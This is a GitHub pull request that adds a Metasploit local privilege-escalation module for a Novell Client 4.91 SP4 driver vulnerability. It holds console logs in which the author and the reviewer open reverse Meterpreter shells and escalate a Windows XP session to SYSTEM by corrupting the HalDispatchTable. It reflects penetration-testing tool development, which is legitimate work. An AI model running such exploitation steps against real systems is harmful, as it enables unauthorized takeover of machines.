Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add module for OSVDB 46578 #2003

Merged
merged 2 commits into from Jun 22, 2013
Merged

Conversation

jvazquez-r7
Copy link
Contributor

Vulnerability in driver install with Novell Client 4.91 SP4. Tested successfully with Novell Client 4.91 SP4 on Windows XP SP3.

The software can be downloaded from: http://download.novell.com/Download?buildid=SyZ1G2ti7wU~

It's a local exploit. In order to test the easier way is to get an unprivileged session (with a payload embedded on an exe and exploits/multi/handler). An use the exploit to escalate the session to SYSTEM:

msf> use exploit/multi/handler 
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.245
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.245:1122) at 2013-06-21 17:24:03 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > use exploit/windows/local/novell_client_nwfs 
msf exploit(novell_client_nwfs) > set session 2
session => 2
msf exploit(novell_client_nwfs) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.0.4:4444 
[*] Detecting the target system...
[*] "Windows XP (Build 2600, Service Pack 3)."
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\nwfs found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x3
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successfull!
[*] Storing the final payload on memory...
[+] Final payload successfully stored at 0xc0c0000
[*] Executing the payload...
[*] Sending stage (751104 bytes) to 192.168.0.4
[+] Enjoy!
[*] Meterpreter session 3 opened (192.168.0.4:4444 -> 192.168.0.4:60186) at 2013-06-21 17:24:34 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 3...
msf exploit(novell_client_nwfs) > sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  2   meterpreter x86/win32  JUAN-C0DE875735\Administrator @ JUAN-C0DE875735  192.168.172.1:4444 -> 192.168.172.245:1122 (192.168.172.245)
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ JUAN-C0DE875735            192.168.0.4:4444 -> 192.168.0.4:60186 (192.168.0.4)

msf exploit(novell_client_nwfs) > 

@wchen-r7
Copy link
Contributor

Works for me, merging:

msf exploit(novell_client_nwfs) > exploit

[*] Started reverse handler on 10.0.1.76:4444 
[*] Detecting the target system...
[*] "Windows XP (Build 2600, Service Pack 3)."
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\nwfs found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x3
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Storing the final payload on memory...
[+] Final payload successfully stored at 0xc0c0000
[*] Executing the payload...
[*] Sending stage (751104 bytes) to 10.0.1.76
[+] Enjoy!
[*] Meterpreter session 2 opened (10.0.1.76:4444 -> 10.0.1.76:52099) at 2013-06-21 21:51:33 -0500

meterpreter > 

@wchen-r7 wchen-r7 merged commit f106b6d into rapid7:master Jun 22, 2013
@jvazquez-r7 jvazquez-r7 deleted the novell_client_nwfs branch November 18, 2014 15:53
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

2 participants